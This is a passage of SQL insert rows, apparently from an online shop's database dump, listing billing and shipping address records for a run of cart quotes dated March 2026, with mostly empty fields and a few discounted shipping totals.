(1021, 694, '2026-03-28 11:12:32', '2026-03-28 11:12:32', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1022, 694, '2026-03-28 11:12:32', '2026-03-28 11:12:32', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1023, 695, '2026-03-28 11:12:56', '2026-03-28 11:12:56', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1024, 695, '2026-03-28 11:12:56', '2026-03-28 11:12:56', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1025, 696, '2026-03-28 11:12:58', '2026-03-28 11:12:58', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1026, 696, '2026-03-28 11:12:58', '2026-03-28 11:12:58', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1027, 697, '2026-03-28 11:13:01', '2026-03-28 11:13:01', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1028, 697, '2026-03-28 11:13:01', '2026-03-28 11:13:01', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1029, 698, '2026-03-28 11:13:03', '2026-03-28 11:13:03', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1030, 698, '2026-03-28 11:13:03', '2026-03-28 11:13:03', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1031, 699, '2026-03-28 11:13:06', '2026-03-28 11:13:06', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1032, 699, '2026-03-28 11:13:06', '2026-03-28 11:13:06', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1033, 700, '2026-03-28 11:13:08', '2026-03-28 11:13:08', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1034, 700, '2026-03-28 11:13:08', '2026-03-28 11:13:08', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1035, 701, '2026-03-28 11:13:11', '2026-03-28 11:13:11', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1036, 701, '2026-03-28 11:13:11', '2026-03-28 11:13:11', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1037, 702, '2026-03-28 11:13:13', '2026-03-28 11:13:13', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1038, 702, '2026-03-28 11:13:13', '2026-03-28 11:13:13', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1039, 703, '2026-03-28 11:13:16', '2026-03-28 11:13:16', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1040, 703, '2026-03-28 11:13:16', '2026-03-28 11:13:16', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1041, 704, '2026-03-28 11:13:19', '2026-03-28 11:13:19', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1042, 704, '2026-03-28 11:13:19', '2026-03-28 11:13:19', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1043, 705, '2026-03-28 11:13:21', '2026-03-28 11:13:21', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1044, 705, '2026-03-28 11:13:21', '2026-03-28 11:13:21', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1045, 706, '2026-03-28 11:13:24', '2026-03-28 11:13:24', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1046, 706, '2026-03-28 11:13:24', '2026-03-28 11:13:24', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1047, 707, '2026-03-28 11:13:26', '2026-03-28 11:13:26', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1048, 707, '2026-03-28 11:13:26', '2026-03-28 11:13:26', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1049, 708, '2026-03-28 11:13:35', '2026-03-28 11:13:35', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1050, 708, '2026-03-28 11:13:35', '2026-03-28 11:13:35', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1051, 709, '2026-03-28 11:47:23', '2026-03-28 11:47:23', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1052, 709, '2026-03-28 11:47:23', '2026-03-28 11:47:23', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 1.0000, 234.0000, 234.0000, 187.2000, 187.2000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, -46.8000, -46.8000, 187.2000, 187.2000, NULL, '[]', NULL, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(1053, 710, '2026-03-28 15:40:22', '2026-03-28 15:40:22', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1054, 710, '2026-03-28 15:40:22', '2026-03-28 15:40:22', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 1.0000, 234.0000, 234.0000, 187.2000, 187.2000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, -46.8000, -46.8000, 187.2000, 187.2000, NULL, '[]', NULL, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(1055, 711, '2026-03-28 15:40:23', '2026-03-28 15:40:23', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1056, 711, '2026-03-28 15:40:23', '2026-03-28 15:40:23', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1057, 712, '2026-03-28 15:40:24', '2026-03-28 15:40:24', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1058, 712, '2026-03-28 15:40:24', '2026-03-28 15:40:24', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1059, 713, '2026-03-28 15:40:26', '2026-03-28 15:40:26', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1060, 713, '2026-03-28 15:40:26', '2026-03-28 15:40:26', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1061, 714, '2026-03-28 15:40:27', '2026-03-28 15:40:27', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1062, 714, '2026-03-28 15:40:27', '2026-03-28 15:40:27', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1063, 715, '2026-03-28 15:40:28', '2026-03-28 15:40:28', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1064, 715, '2026-03-28 15:40:28', '2026-03-28 15:40:28', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1065, 716, '2026-03-28 15:40:30', '2026-03-28 15:40:30', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1066, 716, '2026-03-28 15:40:30', '2026-03-28 15:40:30', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
